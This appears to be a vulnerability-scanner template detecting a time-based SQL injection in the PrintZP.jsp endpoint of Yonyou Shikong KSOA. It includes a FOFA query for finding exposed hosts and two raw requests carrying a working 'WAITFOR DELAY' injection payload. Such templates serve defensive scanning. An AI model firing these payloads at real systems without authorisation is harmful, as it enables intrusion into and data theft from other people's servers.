id: yongyoushikong-KSOA-PrintZP-sql

info:
  name: 用友时空KSOA PrintZP.jsp接口存在SQL延时注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: app="用友-时空KSOA"
    用友时空KSOA系统 PrintZP.jsp接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/140839846
  tags: sql injection



http:
  - raw:
      - |
        GET /kp/PrintZP.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /kp/PrintZP.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A4%27-- HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6 && duration_1<=7'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and


 




